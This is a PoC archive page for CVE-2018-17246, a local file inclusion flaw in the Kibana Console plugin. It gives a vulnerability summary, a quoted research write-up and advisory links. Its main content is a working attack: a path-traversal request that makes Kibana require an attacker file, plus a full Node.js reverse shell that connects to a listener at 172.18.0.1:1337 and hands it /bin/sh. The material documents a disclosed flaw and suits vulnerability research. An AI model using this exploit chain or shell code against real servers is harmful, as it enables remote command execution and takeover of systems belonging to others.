Related vulnerability
Title:
Elasticsearch Kibana Console plugin security vulnerability
(CVE-2018-17246)
Description: Elasticsearch Kibana (formerly elasticsearch-dashboard) is an open-source, browser-based analytics and search dashboard for Elasticsearch from the Dutch company Elasticsearch. Console is one of its plugins. The Console plugin in Elasticsearch Kibana versions before 6.4.3 and before 5.6.13 contains a security vulnerability. An attacker who can send requests to Kibana can exploit it to execute arbitrary commands on the host operating system with the privileges of the Kibana process (as the write-up below notes, the attacker first needs some way to place a file on the server).
Description
CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
Introduction
# CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
A Local File Inclusion in Kibana found by [CyberArk Labs](https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/). Because the included file is passed to Node's `require`, the LFI can be used to execute a reverse shell on the Kibana server with the following payload:
```
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js
```
As you have probably guessed, this attack needs to be paired with an unrestricted file upload or any other primitive that lets you write a file on the server: the traversal only lets you choose which existing file Kibana `require`s, so the JavaScript payload has to be on disk first.
> There is no input validation so we can change the name of the JavaScript file to anything we want. In this case, with the path traversal technique, we can choose any file on the Kibana server.
> One thing to be aware of, however, is node's [module caching](https://nodejs.org/api/modules.html#modules_caching) feature. Essentially, since the LFI works by sending unsanitized user input to node's `require` function, the included module (the attacker's payload) will be cached _by filename_. This means that you cannot send the same payload to, e.g., recover a reverse shell.

**Vulnerability details**: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
**Security Advisory**: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246
---
* Tested against Kibana 6.0.0 from Docker (the PoC works even with no Elasticsearch instance linked to it)
* shell.js taken from https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell
```js
(function () {
  var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []); // shell runs with the Kibana process's privileges
  var client = new net.Socket();
  // Attacker listener address and port; change to your own. 172.18.0.1 is the
  // host side of the Docker network in the test setup above.
  client.connect(1337, "172.18.0.1", function () {
    client.pipe(sh.stdin);   // bytes from the listener -> shell stdin
    sh.stdout.pipe(client);  // shell output -> listener
    sh.stderr.pipe(client);
  });
  return /a/; // Prevents the Node.js application from crashing
})();
```
File snapshot
[4.0K] /data/pocs/19a697573951e6ed8b8e3e03bfd9bf0dd59f9c86
└── [2.0K] README.md
0 directories, 1 file
Notes
1. We recommend accessing the PoC through the original source first.
2. If the source has gone away or cannot be reached, send an email to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.